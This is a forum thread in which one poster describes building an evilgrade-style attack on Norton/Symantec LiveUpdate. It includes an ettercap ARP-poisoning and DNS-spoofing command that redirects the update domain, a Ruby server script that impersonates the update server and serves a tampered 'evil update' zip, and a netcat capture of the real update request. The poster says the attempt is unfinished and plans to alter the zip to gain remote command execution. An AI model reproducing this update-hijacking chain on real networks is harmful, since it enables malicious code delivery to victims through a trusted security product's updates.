i8igmac

here is a quick update on what i have done so far... i was going to make a video but i see no need... the client successfully downloads the modified zip file from my computer during the dns spoof (screenshot of wireshark) i just need to modify the zip packages contents to trigger execution... sudo ettercap -T -F filter.ef -P dns_spoof -M arp // // first thing is the ettercap filter drops encryption for more plaintext (not sure if its needed for this situation but i like to use it) dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104] sudo ruby exploit.rb (its something i put together in a few minutes, dont judge me ,-P require 'socket' #SERVER server = TCPServer.open(80) loop { client = server.accept print client.read(100) #should recive /get /minitri.flg client.puts("HTTP/1.1 200 OK Content-Length: 1 Content-Type: text/plain Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT ETag: "+'"'+"1-42ea9080"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 01:52:21 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r") print client.read(100) #should recive GET /update symnetc from client client.print("HTTP/1.1 200 OK Content-Type: application/zip Last-Modified: Sun, 15 May 2011 21:16:04 GMT ETag: W/"+'"'+"15a1-4dd04294"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 20:50:18 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=240\n\r\n\r") #now send payload file = open('/home/bigmac/out.zip', "rb") # new evil update fileContent = file.read client.print(fileContent) #client.print "Closing the connection. Bye!" # client.close # Disconnect from the client } wireshark screenshot of the zipfile downloaded 192.168.1.102 <---> 192.168.1.104 img838.imageshack.us/i/screenshotwireshark.png ... i should post the zipfile, im sure all that is needed is changing a few numbers around to trigger execution

ettercap, filter to drop encryption for more plain text... i fixed my problem with extracting the file ,-) instead of pasting to text editor i just nc netcat xxx.xxx.xx 80 &gt; out.zip GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1. If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT. Cache-control: max-age=0. Cache-Control: no-cache. Cache-Control: max-stale=0. Cache-Control: min-fresh=1000. Accept: */*. HOST: liveupdate.symantecliveupdate.com. User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE. Connection: Keep-Alive. i open out.zip with text editor and removed the response header field from the top of the file and the file extracts just fine ,-) i would really like to share more in-depth because this looks promising... one of the files contents looks like this, one line MOVE([TempDir],%StreamDefDir%) i think this could give me sorta remote command execution a quick test would be 'ping 192.168.1.101' (my labtop ip) i found this log some one posted and now gives me a better view of whats going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt

Maybe I could get some ones opinion, I have captured a get request like /get symtec/id/dir/update.zip I can reproduce this get request with ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents but it fails. I hope to write my own evilgrade style exploit. Right now I'm on my Droid, I will post this get request and the binary data tonight. Any thoughts on how to properly handle this zip file please share